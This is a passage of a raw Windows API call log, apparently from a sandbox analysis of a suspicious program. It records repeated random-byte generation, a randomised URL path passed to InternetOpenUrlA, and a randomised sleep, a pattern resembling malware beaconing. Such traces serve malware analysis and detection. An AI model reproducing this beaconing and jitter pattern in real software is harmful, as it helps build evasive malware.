[0183.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.604] GetProcessHeap () returned 0x440000 [0183.604] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473da0 [0183.604] lstrcpyA (in: lpString1=0x473da0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0183.605] lstrcatA (in: lpString1="\x04", lpString2="/ei129sibjuqY7iv0nj8zlarrjd2fpvVm5N6vq7/" | out: lpString1="\x04/ei129sibjuqY7iv0nj8zlarrjd2fpvVm5N6vq7/") returned="\x04/ei129sibjuqY7iv0nj8zlarrjd2fpvVm5N6vq7/" [0183.605] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0183.605] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/ei129sibjuqY7iv0nj8zlarrjd2fpvVm5N6vq7/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0183.605] GetProcessHeap () returned 0x440000 [0183.605] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473da0 | out: hHeap=0x440000) returned 1 [0183.605] GetProcessHeap () returned 0x440000 [0183.605] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f5870 | out: hHeap=0x440000) returned 1 [0183.605] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0183.606] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0183.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0183.607] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0183.607] Sleep (dwMilliseconds=0x158bf) [0183.821] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0183.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.822] GetProcessHeap () returned 0x440000 [0183.822] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d5e20 [0183.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.822] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e21, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x4d5e21) returned 0x0 [0183.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.823] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.823] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0183.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0183.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.824] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.825] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0183.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e36, cbBuffer=0x12, dwFlags=0x2 | out: pbBuffer=0x4d5e36) returned 0x0 [0183.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0183.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0183.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0183.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e48, cbBuffer=0x31, dwFlags=0x2 | out: pbBuffer=0x4d5e48) returned 0x0 [0184.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.017] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.018] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.018] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.019] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.019] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.020] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.021] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.022] BCryptGenRandom (in: hAlgorithm=0x0, 